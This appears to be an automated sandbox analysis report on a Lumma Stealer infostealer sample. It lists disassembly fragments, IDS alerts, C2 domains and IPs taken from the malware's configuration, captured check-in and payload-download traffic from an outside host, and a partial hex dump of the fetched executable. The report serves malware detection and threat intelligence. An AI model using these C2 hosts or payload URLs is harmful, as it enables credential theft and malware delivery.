Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp eax	2_2_024EC268
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	2_2_024EB2CF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_024EB2CF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	2_2_024EB2C4
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_024EB2C4
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	2_2_024EB2C2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_024EB2C2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_024EB3FC
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp al, 2Eh	2_2_024D63B6
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, edx	2_2_024BC030
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp eax	2_2_024D70E4
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	2_2_024ED0F7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	2_2_024D60F7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024DB08B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024DB0AF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024DB05B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	2_2_024CE1E7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_024DA637
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024DC6C3
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	2_2_024DB763
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024DB763
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp eax	2_2_024D6739
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	2_2_024C87DF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	2_2_024C77E9
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp ecx	2_2_024EC79B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edx, eax	2_2_024D7797
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ebx, edi	2_2_024CD4D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	2_2_024D54D1
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	2_2_024C554C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	2_2_024C6544
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	2_2_024ED557
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	2_2_024ED557
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_024CC528
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	2_2_024D552B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	2_2_024D559D
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	2_2_024D55B3
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	2_2_024BDA09
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	2_2_024BDA09
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	2_2_024BEAA2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	2_2_024BCB7E
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	2_2_024D5BF7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ecx, di	2_2_024D5BF7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024BABA7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edx, ecx	2_2_024BABA7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	2_2_024DB75E
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024DB75E
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024C4806
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	2_2_024D0817
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_024E3897
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_024DC8B1
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_024DC94B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	2_2_024B9967
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	2_2_024B9967
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	2_2_024B9967
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_024C6907
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov eax, edx	2_2_024CC921
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	2_2_024D89C0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	2_2_024EA9DE
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	2_2_024C99D7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_024DC98D
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_024DC99C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	2_2_024E6E67
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_024C5F79
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024D1F77
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [ebx], dx	2_2_024C8F35
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_024C8F35
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	2_2_024ECFC7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	2_2_024BDF8C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	2_2_024EBC08
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_024D9C17
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	2_2_024CEC17
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	2_2_024E6C3B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov esi, eax	2_2_024D3C9B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_024EAD19
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	2_2_024ECD87

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.5:63478 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.5:49702 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.5:49706 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:60957 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:65226 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.5:51454 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:61916 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.5:55725 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.5:49708 -> 45.77.249.79:443
Source: Network traffic	Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.5:62073 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.5:51781 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49706 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49715 -> 104.121.10.34:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 45.77.249.79:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 45.77.249.79:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 17 Dec 2024 07:18:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 07:15:01 GMTETag: "5a000-629720e372f3a"Accept-Ranges: bytesContent-Length: 368640Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f 13 29 12 0b 72 47 41 0b 72 47 41 0b 72 47 41 b6 3d d1 41 0a 72 47 41 15 20 c3 41 15 72 47 41 15 20 d2 41 1f 72 47 41 15 20 c4 41 65 72 47 41 2c b4 3c 41 0c 72 47 41 0b 72 46 41 7d 72 47 41 15 20 cd 41 0a 72 47 41 15 20 d3 41 0a 72 47 41 15 20 d6 41 0a 72 47 41 52 69 63 68 0b 72 47 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 67 98 24 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 fa 03 00 00 26 3f 00 00 00 00 00 77 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 43 00 00 04 00 00 91 97 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 29 04 00 3c 00 00 00 00 10 42 00 a8 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c f8 03 00 00 10 00 00 00 fa 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e 23 00 00 00 10 04 00 00 24 00 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc c4 3d 00 00 40 04 00 00 70 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 0c 01 00 00 10 42 00 00 0e 01 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 45.77.249.79 45.77.249.79
Source: Joe Sandbox View	IP Address: 104.21.56.70 104.21.56.70
Source: Joe Sandbox View	IP Address: 104.131.68.180 104.131.68.180

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.131.68.180:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 45.77.249.79:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.121.10.34:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 104.21.56.70:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.00000000009B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=962e3ca250d10fc8fbc2ea3a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; 